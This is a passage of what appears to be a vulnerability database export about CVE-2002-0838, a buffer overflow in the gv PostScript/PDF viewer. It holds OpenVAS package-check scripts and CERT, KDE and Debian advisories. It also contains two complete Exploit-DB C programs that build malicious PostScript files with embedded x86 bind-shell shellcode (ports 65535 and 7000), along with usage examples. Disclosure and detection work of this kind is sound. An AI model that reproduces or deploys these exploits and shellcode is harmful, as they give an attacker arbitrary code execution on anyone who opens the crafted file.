value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200408-10 (gv)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/gv\", unaffected: make_list(\"ge 3.5.8-r4\"), vulnerable: make_list(\"le 3.5.8-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "description": "The remote host is missing an update to kdegraphics\nannounced via advisory DSA 182-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53756", "href": "http://plugins.openvas.org/nasl.php?oid=53756", "type": "openvas", "title": "Debian Security Advisory DSA 182-1 (kdegraphics)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_182_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 182-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in kghostview which is part\nof the KDE-Graphics package. This problem is triggered by scanning\nthe PostScript file and can be exploited by an attacker sending a\nmalformed PostScript or PDF file. The attacker is able to cause\narbitrary code to be run with the privileges of the victim.\n\nThis problem has been fixed in version 2.2.2-6.8 for the current\nstable distribution (woody) and in version 2.2.2-6.9 for the unstable\ndistribution (sid). 
The old stable distribution (potato) is not\naffected since no KDE is included.\n\nWe recommend that you upgrade your kghostview package.\";\ntag_summary = \"The remote host is missing an update to kdegraphics\nannounced via advisory DSA 182-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20182-1\";\n\nif(description)\n{\n script_id(53756);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:24:46 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 182-1 (kdegraphics)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kghostview\", ver:\"2.2.2-6.8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:44:18", "bulletinFamily": "info", 
"cvelist": ["CVE-2002-0838"], "description": "### Overview \n\nA remotely exploitable buffer overflow vulnerability exists in gv.\n\n### Description \n\nA remotely exploitable buffer overflow vulnerability exists in gv. [gv](<http://wwwthep.physik.uni-mainz.de/~plass/gv/>) allows a user to view and navigate PostScript and PDF documents by providing an interface to the ghostscript interpreter. This vulnerability can allow a remote attacker to execute arbitrary code on a vulnerable host. \n \n--- \n \n### Impact \n\nA remote attacker can execute arbitrary code on a vulnerable host with the privileges of the victim. \n \n--- \n \n### Solution \n\nApply a patch. \n \n--- \n \n### Vendor Information\n\n600777\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Debian __ Affected\n\nUpdated: October 17, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n<http://www.debian.org/security/2002/dsa-176>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23600777 Feedback>).\n\n### Gentoo Linux __ Affected\n\nUpdated: October 17, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- - -------------------------------------------------------------------- \nGENTOO LINUX SECURITY ANNOUNCEMENT 200210-003 \n- - -------------------------------------------------------------------- \n` \n`PACKAGE : ggv \nSUMMARY : buffer overflow \nEXPLOIT : local \nDATE 
: 2002-10-17 08:30 UTC \n` \n`- - -------------------------------------------------------------------- \n` \n`ggv shares the same buffer overflow problem that gv did. \n` \n`Read the full advisory at \n``<http://www.idefense.com/advisory/09.26.02.txt>`` \n` \n`SOLUTION \n` \n`It is recommended that all Gentoo Linux users who are running \napp-text/ggv-1.99.90 and earlier update their systems \nas follows: \n` \n`emerge rsync \nemerge ggv \nemerge clean \n` \n`- - -------------------------------------------------------------------- \naliz@gentoo.org - GnuPG key is available at www.gentoo.org/~aliz \n- - -------------------------------------------------------------------- \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n` \n`iD8DBQE9rnUQfT7nyhUpoZMRAr6jAKCNU3Ko5pluB0bZ3yIlw4paUyrh1ACgqQbf \nCvBJCihfTpuMWwci2+Rhn78= \n=mnVF \n-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23600777 Feedback>).\n\n### KDE Desktop Environment Project __ Affected\n\nUpdated: October 17, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n<http://www.kde.org/info/security/advisory-20021008-1.txt>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23600777 Feedback>).\n\n### Red Hat Inc. 
__ Affected\n\nUpdated: October 17, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n<http://rhn.redhat.com/errata/RHSA-2002-207.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23600777 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.idefense.com/advisory/09.26.02.txt>\n * <http://wwwthep.physik.uni-mainz.de/~plass/gv/>\n * <http://rhn.redhat.com/errata/RHSA-2002-207.html>\n * [http://marc.theaimsgroup.com/?l=bugtraq&m=103305615613319&w=2](<http://marc.theaimsgroup.com/?l=bugtraq&m=103305615613319&w=2>)\n\n### Acknowledgements\n\nThanks to David Endler for reporting this vulnerability.\n\nThis document was written by Ian A Finlay.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0838](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-0838>) \n---|--- \n**Severity Metric:** | 16.50 \n**Date Public:** | 2002-09-26 \n**Date First Published:** | 2002-10-17 \n**Date Last Updated: ** | 2002-10-17 20:02 UTC \n**Document Revision: ** | 14 \n", "modified": "2002-10-17T20:02:00", "published": "2002-10-17T00:00:00", "id": "VU:600777", "href": "https://www.kb.cert.org/vuls/id/600777", "type": "cert", "title": "gv contains buffer overflow in sscanf() function", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T17:27:59", "description": "GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (1). CVE-2002-0838. 
Local exploit for linux platform", "published": "2002-09-26T00:00:00", "type": "exploitdb", "title": "GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0838"], "modified": "2002-09-26T00:00:00", "id": "EDB-ID:21871", "href": "https://www.exploit-db.com/exploits/21871/", "sourceData": "source: http://www.securityfocus.com/bid/5808/info\r\n\r\ngv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.\r\n\r\nIt has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.\r\n\r\n// gv <=3.5.8 remote exploit by priestmaster\r\n#include <stdio.h>\r\n\r\n#define STDALIGN\t264\t// Standard align\r\n#define SCBUF\t\t800\t// Shellcode buffer size\r\n#define GARBAGE\t\t100\t// Garbage for the end\r\n\t\t\t\t// of the evil_buffer\r\n#define NOP\t\t'G'\t// instead of \"\\x90\" \r\n\r\n\r\n// Copyright (c) Ramon de Carvalho Valle\r\n// Bind shell port number 65535\r\nchar bindcode[]= /* 72 bytes */\r\n \"\\x31\\xdb\" /* xorl %ebx,%ebx */\r\n \"\\xf7\\xe3\" /* mull %ebx */\r\n \"\\x53\" /* pushl %ebx */\r\n \"\\x43\" /* incl %ebx */\r\n \"\\x53\" /* pushl %ebx */\r\n \"\\x6a\\x02\" /* pushl $0x02 */\r\n \"\\x89\\xe1\" /* movl %esp,%ecx */\r\n \"\\xb0\\x66\" /* movb $0x66,%al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\xff\\x49\\x02\" /* decl 0x02(%ecx) */\r\n \"\\x6a\\x10\" /* pushl $0x10 */\r\n \"\\x51\" /* pushl %ecx */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x89\\xe1\" /* movl %esp,%ecx */\r\n \"\\x43\" /* incl %ebx */\r\n \"\\xb0\\x66\" /* movb $0x66,%al */ \r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x89\\x41\\x04\" /* movl %eax,0x04(%ecx) */\r\n \"\\xb3\\x04\" /* movb 
$0x04,%bl */\r\n \"\\xb0\\x66\" /* movb $0x66,%al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x43\" /* incl %ebx */\r\n \"\\xb0\\x66\" /* movb $0x66,%al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x59\" /* popl %ecx */\r\n \"\\x93\" /* xchgl %eax,%ebx */\r\n \"\\xb0\\x3f\" /* movb $0x3f,%al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x49\" /* decl %ecx */\r\n \"\\x79\\xf9\" /* jns <bindsocketshellcode+45> */\r\n \"\\x68\\x2f\\x2f\\x73\\x68\" /* pushl $0x68732f2f */\r\n \"\\x68\\x2f\\x62\\x69\\x6e\" /* pushl $0x6e69622f */\r\n \"\\x89\\xe3\" /* movl %esp,%ebx */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x53\" /* pushl %ebx */\r\n \"\\x89\\xe1\" /* movl %esp,%ecx */ \r\n //\"\\xb0\\x0b\" /* movb $0x0b,%al \t\t */\r\n // 0b isn't allowed (filter). I use xor %eax, %eax\r\n // and eleven inc %al. It's the same as \\xb0\\x0b\r\n \"\\x31\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\"\r\n \"\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\"\r\n \"\\xcd\\x80\"\r\n; \r\n\r\n// How to start the exploit\r\nvoid usage(char *prgname)\r\n{\r\n printf(\"\\nUsage: %s align retaddr \\n\\n\"\r\n \"align (0 on SUSE 7.0)\\n\"\r\n \"retaddr (return address (should point to shellcode))\\n\");\r\n exit(0);\r\n}\r\n\r\n/////////////////////////////////////////\r\n\r\nmain(int argc, char **argv)\r\n{\r\n\tint align;\t// Align for the buffer\r\n\tlong retaddr;\t// return address\r\n\t\r\n\tchar buf[BUFSIZ];\t// The evil buffer\r\n\tchar *p;\t\t// Pointer to evil buffer\r\n\r\n\tif(argc != 3)\t\t// 2 Arguments required\r\n\t{\r\n\t\tusage(argv[0]);\r\n\t}\r\n\r\n\t// Get align and return address from parameters\r\n\talign = atoi(argv[1]);\r\n\tretaddr = strtoul(argv[2], 0 , NULL);\r\n\r\n\t/* DEBUG, Shellcode testing\r\n\tvoid (*dsr)();\r\n\t(long) dsr = &bindcode; \r\n\tdsr(); */\r\n\r\n\t// Point to buffer\r\n\tp = buf;\r\n\r\n\t// Memset the buffer with NOP's\r\n\tmemset(p, NOP, BUFSIZ);\r\n\r\n\tp += STDALIGN+align;\r\n\r\n\t// Write return address in buffer (It's 
a very simple stack overflow).\r\n\t*((void **)p) = (void *) retaddr;\r\n\tp+=4;\r\n\r\n\t// Put shellcode in buffer\r\n\tp+=SCBUF-strlen(bindcode)-1;\r\n\tmemcpy(p, bindcode, strlen(bindcode));\r\n\tp += strlen(bindcode);\r\n\t\r\n\t// Add some garbage to end of buffer\r\n\tp += GARBAGE;\r\n\t\r\n\t// Null terminate buffer\r\n\t*p = 0;\r\n\t\r\n\t// Generate pdf file\r\n\tprintf(\"%%!PS-Adobe-3.0\\n\");\r\n\tprintf(\"%%%%Creator: groff 1.16 (with modifications by zen-parse by hand 1.00a)\\n\");\r\n\tprintf(\"%%%%CreationDate: Sat Jun 15 15:30ish\\n\");\r\n\r\n\t// In page order, the stack overflow occur.\r\n\tprintf(\"%%%%PageOrder: %s\\n\", buf);\r\n\tprintf(\"%%%%EndComments\\n\");\r\n\tprintf(\"%%%%EOF\");\t\r\n}\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21871/"}, {"lastseen": "2016-02-02T17:28:07", "description": "GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (2). CVE-2002-0838. Local exploit for linux platform", "published": "2002-09-26T00:00:00", "type": "exploitdb", "title": "GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0838"], "modified": "2002-09-26T00:00:00", "id": "EDB-ID:21872", "href": "https://www.exploit-db.com/exploits/21872/", "sourceData": "source: http://www.securityfocus.com/bid/5808/info\r\n \r\ngv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.\r\n \r\nIt has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. 
When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.\r\n\r\n/*\r\n * gv postscript viewer exploit , infamous42md AT hotpop DOT com\r\n *\r\n * run of the mill bof. spawns a remote shell on port 7000. woopty doo. if\r\n * someone has been able to exploit the heap overflow in cfengine, please email\r\n * me and teach me something. after days of pain i've concluded it's not\r\n * possible b/c you can't manipulate the heap enough to get anything good in\r\n * front of you. please prove me wrong so i can learn.\r\n *\r\n * shouts to mitakeet\r\n *\r\n * [n00b@localho.outernet] netstat -ant | grep 7000\r\n * [n00b@localho.outernet] gcc -Wall -o gvown gvown.c\r\n * [n00b@localho.outernet] ./gvown 0xbffff350\r\n * [n00b@localho.outernet] ./gv h4x0ring_sacr3ts_uncuv3red.ps\r\n * [n00b@localho.outernet] netstat -ant | grep 7000\r\n * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN\r\n */\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <fcntl.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n\r\n#define NOP 0x90\r\n#define NNOPS 512\r\n#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)\r\n#define BS 0x10000\r\n#define RETADDR_BYTES 400\r\n#define PS_COMMENT \"%!PS-Adobe- \"\r\n#define OUTFILE \"h4x0ring_sacr3ts_uncuv3red.ps\"\r\n\r\n\r\n/* call them on port 7000, mine */\r\nchar remote[] 
=\r\n\"\\x31\\xc0\\x50\\x50\\x66\\xc7\\x44\\x24\\x02\\x1b\\x58\\xc6\\x04\\x24\\x02\\x89\\xe6\"\r\n\"\\xb0\\x02\\xcd\\x80\\x85\\xc0\\x74\\x08\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\x50\"\r\n\"\\x6a\\x01\\x6a\\x02\\x89\\xe1\\x31\\xdb\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc5\\x6a\"\r\n\"\\x10\\x56\\x50\\x89\\xe1\\xb0\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x55\\x89\\xe1\\x31\"\r\n\"\\xc0\\x31\\xdb\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x31\\xc0\\x50\\x50\\x55\\x89\\xe1\\xb0\"\r\n\"\\x66\\xb3\\x05\\xcd\\x80\\x89\\xc5\\x31\\xc0\\x89\\xeb\\x31\\xc9\\xb0\\x3f\\xcd\\x80\"\r\n\"\\x41\\x80\\xf9\\x03\\x7c\\xf6\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\"\r\n\"\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\";\r\n\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int len, x, fd;\r\n char buf[BS];\r\n u_long retaddr;\r\n\r\n if(argc < 2){\r\n fprintf(stderr, \"Usage: %s < retaddr >\\n\", argv[0]);\r\n return EXIT_FAILURE;\r\n }\r\n sscanf(argv[1], \"%lx\", &retaddr);\r\n\r\n /* create 3vil buf */\r\n memset(buf, NOP, BS);\r\n strcpy(buf, PS_COMMENT);\r\n len = strlen(buf);\r\n for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))\r\n memcpy(buf+x+len, &retaddr, sizeof(retaddr));\r\n len += x + NNOPS;\r\n strcpy(buf+len, remote);\r\n strcat(buf+len, \"\\n\");\r\n len += strlen(remote) + 1; /* + NULL */\r\n\r\n /* create the 3vil file */\r\n if( (fd = open(OUTFILE, O_RDWR|O_CREAT|O_EXCL, 0666)) < 0)\r\n die(\"open\");\r\n\r\n if(write(fd, buf, len) < 0)\r\n die(\"write\");\r\n\r\n close(fd);\r\n\r\n return 0;\r\n}", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21872/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-0838"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nKDE Security Advisory: KGhostview Arbitary Code Execution\r\nOriginal Release Date: 2002-10-08\r\nURL: 
http://www.kde.org/info/security/advisory-20021008-1.txt\r\n\r\n0. References\r\n\r\n cve.mitre.org: CAN-2002-0838\r\n BUGTRAQ:20020926 iDEFENSE Security Advisory 09.26.2002: \r\n Exploitable Buffer Overflow in gv\r\n http://marc.theaimsgroup.com/?l=bugtraq&m=103305615613319&w=2\r\n\r\n\r\n1. Systems affected:\r\n\r\n KGhostView of any KDE release between KDE 1.1 and KDE 3.0.3a\r\n\r\n2. Overview:\r\n \r\n KGhostview includes a DSC 3.0 parser from GSview, which is vulnerable\r\n to a buffer overflow while parsing a specially crafted .ps input\r\n file. It also contains code from gv 3.5.x which is vulnerable to another \r\n buffer overflow triggered by malformed postscript or Adobe pdf files. \r\n\r\n3. Impact:\r\n \r\n Viewing certain Postscript or PDF files can result in the execution of \r\n arbitary code placed in the file and as a result opens possibilities for\r\n any remote manipulation under the local user account.\r\n \r\n4. Solution:\r\n \r\n Apply the patch listed in section 5 to kdegraphics/kghostview, or update\r\n to KDE 3.0.4. \r\n\r\n kdegraphics-3.0.4 can be downloaded from\r\n\r\n http://download.kde.org/stable/3.0.4 :\r\n\r\n 6065219c825102c843ba582c4a520cac kdegraphics-3.0.4.tar.bz2\r\n\r\n5. 
Patch:\r\n\r\n A patch for KDE 3.0.3 is available from\r\n \r\n ftp://ftp.kde.org/pub/kde/security_patches :\r\n 9e33962406ac123e4fbdab20b4123ccf post-3.0.3-kdegraphics-kghostview.diff\r\n \r\n A patch for KDE 2.2.2 is available from\r\n \r\n ftp://ftp.kde.org/pub/kde/security_patches : \r\n 62a1178c6a1730cbab98bbc825adafe9 post-2.2.2-kdegraphics-kghostview.diff\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQE9pDXDvsXr+iuy1UoRAvfZAKCxyetx90FfIDpTeq028QUEfXM6TwCgjOMl\r\npLaRHeMmf/kUDz9HwpOW6fk=\r\n=w/u0\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2002-10-12T00:00:00", "published": "2002-10-12T00:00:00", "id": "SECURITYVULNS:DOC:3627", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3627", "title": "KDE Security Advisory: KGhostview Arbitary Code Execution", "type": "securityvulns", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:23:08", "bulletinFamily": "unix", "cvelist": ["CVE-2002-0838"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 176-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 16th, 2002 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : gv\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE Id : CAN-2002-0838\nBugTraq ID : 5808\n\nZen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. This problem is triggered by scanning the PostScript\nfile and can be exploited by an attacker sending a malformed\nPostScript or PDF file. 
The attacker is able to cause arbitrary code\nto be run with the privileges of the victim.\n\nThis problem has been fixed in version 3.5.8-26.1 for the current\nstable distribution (woody), in version 3.5.8-17.1 for the old stable\ndistribution (potato) and version 3.5.8-27 for the unstable\ndistribution (sid).\n\nWe recommend that you upgrade your gv package.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1.dsc\n Size/MD5 checksum: 555 3aa3cb663f578cbf02c09f370951a814\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1.diff.gz\n Size/MD5 checksum: 29382 2e9e7149b69bf36a80632c8b695b6495\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8.orig.tar.gz\n Size/MD5 checksum: 369609 8f2f0bd97395d6cea52926ddee736da8\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_alpha.deb\n Size/MD5 checksum: 278646 b12dd5fef60ff840b3921a511eb28c74\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_arm.deb\n Size/MD5 checksum: 238918 52892bea304128845836b4c9976d39a3\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_i386.deb\n Size/MD5 checksum: 226416 4f44d7df45cec7b132c1c7c9a6ba84ea\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_m68k.deb\n Size/MD5 checksum: 217712 2decb437f1a28beac92edb63f3d31444\n\n PowerPC architecture:\n\n 
http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_powerpc.deb\n Size/MD5 checksum: 244382 cb3bd27b214e391ada83ce0593e16715\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_sparc.deb\n Size/MD5 checksum: 237878 ba1bdf19f68f62d36c8f58c015867287\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1.dsc\n Size/MD5 checksum: 559 e7a2b5dfb91d7217d1b171b24682ea41\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1.diff.gz\n Size/MD5 checksum: 18453 f9910a58912e1a6fbaef33ff4fe27b94\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8.orig.tar.gz\n Size/MD5 checksum: 369609 8f2f0bd97395d6cea52926ddee736da8\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_alpha.deb\n Size/MD5 checksum: 273262 6cb8adebf56cc25ef43d1358636dc9ca\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_arm.deb\n Size/MD5 checksum: 243382 2707a8a87e133a45cc2a98dd223e7c8f\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_i386.deb\n Size/MD5 checksum: 226106 304f32b84e6497612222a26c9dc5c1fd\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_ia64.deb\n Size/MD5 checksum: 313888 522c58c4d2fecb99424533c4980d1409\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_hppa.deb\n Size/MD5 checksum: 252054 aa50a00ebb6d5c304ec94bbf1e65a2c9\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_m68k.deb\n Size/MD5 checksum: 216922 d11c3c10e70fb1593ce15c2b6c3863be\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_mips.deb\n Size/MD5 checksum: 252064 6b944b4c04f4488ea380063bdf3324ad\n\n Little endian MIPS 
architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_mipsel.deb\n Size/MD5 checksum: 250914 87afee172cf73ed91ad0449fadd9bb4b\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_powerpc.deb\n Size/MD5 checksum: 243450 9c77e9860e1044bc4c7b9a7b054e8a4d\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_s390.deb\n Size/MD5 checksum: 232784 96242f88c593319e0d3fddef928c47d2\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_sparc.deb\n Size/MD5 checksum: 237798 e5091427da6e76dbb9bb34cf03e94647\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and 